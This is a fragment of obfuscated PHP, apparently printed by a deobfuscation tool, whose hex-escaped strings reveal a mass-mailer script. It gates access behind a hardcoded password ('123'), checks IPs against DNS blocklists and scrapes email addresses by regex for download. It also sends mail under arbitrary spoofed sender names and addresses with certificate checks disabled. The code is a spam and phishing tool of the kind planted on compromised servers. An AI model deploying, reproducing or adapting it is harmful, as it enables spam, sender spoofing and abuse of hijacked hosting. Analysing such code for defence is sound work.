goto Js1_Q; iaQSy: print "\40\x20\40\40\x3c\144\x69\x76\40\x63\154\141\x73\163\x3d\42\143\x6f\154\x2d\x6c\x67\55\x31\x32\x22\76"; goto uY2CJ; zMnkk: $reverse_ip = implode("\x2e", array_reverse(explode("\x2e", $_GET["\x63\150\145\x63\153\x5f\151\160"]))); goto w3eyX; yzro1: print $dnsN; goto sZhjT; TUIYE: $mail->setFrom(leafClear($senderEmail, $email), leafClear($senderName, $email)); goto WHJ2Y; w3eyX: $dnsT = count($dnsbl_lookup); goto AKV17; Jo4FD: goto wz0S2; goto yc9V8; kqM6B: if ($_POST["\162\x65\163\165\154\164\x74\171\160\145"] == "\x64\x6f\167\156\x6c\x6f\x61\144") { goto MOhFt; } goto YZpzq; GEEsV: $bit8 = "\x73\145\x6c\x65\x63\x74\x65\x64"; goto Fgqp2; JENQm: t6Gw5: goto f5lEY; nhY17: if (!($_POST["\x61\143\x74\151\157\156"] == "\163\x65\x6e\144" or $_POST["\141\x63\164\x69\x6f\x6e"] == "\x73\x63\x6f\162\145")) { goto dq0rA; } goto MncBT; GibH8: hlLFA: goto f21N5; qW1nC: EV_yj: goto Kifmh; Srgi6: leafheader(); goto XRoYz; GooRm: function leafTrim($string) { $string = urldecode($string); return stripslashes(trim($string)); } goto AxYmD; wcTBU: exit; goto hGQDj; EUn2J: print "\40\x20\40\40\74\x2f\144\x69\166\x3e"; goto oUswT; QEONm: sQR84: goto LH62b; MPOpO: if (!($_GET["\145\x6d\141\151\154\x66\151\x6c\164\145\x72"] == "\151\146\x72\x61\155")) { goto E8ziT; } goto kqM6B; GDt4y: $utf8 = "\x73\x65\x6c\x65\x63\x74\x65\144"; goto AW7qj; GijeA: m5UwD: goto KlBcn; qzWnC: if ($_POST["\163\x75\142\x6d\151\x74"] == "\145\x78\164\162\x61\143\164") { goto YXuPZ; } goto CPQh5; unaP7: print $viewMessage; goto Pb7sf; nlt3S: l1gkn: goto MGDZr; WXxu2: $password = "\x31\x32\63"; goto xDMzF; MbqOy: iUdyH: goto MfEoJ; zKaff: if (isset($_REQUEST["\x70\x61\x73\163"]) and $_REQUEST["\160\141\163\x73"] == $password) { goto rlw_d; } goto APQeT; fwIGh: $_GET["\150\x6f\163\x74"] = explode("\54", $_GET["\x68\157\x73\164"]); goto gMJYH; kwQ7V: header("\103\157\156\x74\x65\156\164\55\x44\x69\x73\x70\x6f\x73\151\164\151\157\x6e\x3a\x20\x61\164\164\x61\143\150\155\145\x6e\164\x3b\40\146\x69\154\x65\x6e\x61\155\x65\75\145\x6d\x61\x69\x6c\163" . time() . "\56\164\x78\164"); goto g0gp9; YiNik: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); goto j4r7u; i7AUS: $mail->AltBody = strip_tags(leafClear($messageLetter, $email)); goto GibH8; MYUks: if (!($_POST["\x61\143\x74\x69\157\156"] == "\166\x69\x65\167")) { goto pzcZN; } goto rSM14; EWpCq: $pattern = "\57\x5b\x41\55\132\141\55\172\60\x2d\x39\56\x5f\x25\x2b\55\x5d\x2b\100\133\x41\55\x5a\x61\55\172\x30\55\71\x2e\x2d\x5d\53\134\56\x5b\101\x2d\x5a\x61\x2d\172\x5d\x7b\62\54\x34\x7d\x2f"; goto lt1EJ; Gb7fw: E8ziT: goto Srgi6; ozylK: goto AsUeS; goto qW1nC; aBS1v: $messageHeaders = $mail->getSentMIMEMessage(); goto kg5D3; pi6kT: print "\x3c\x2f\142\157\x64\171\76";

Function Calls





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Eval Count 0
Decode Time 150 ms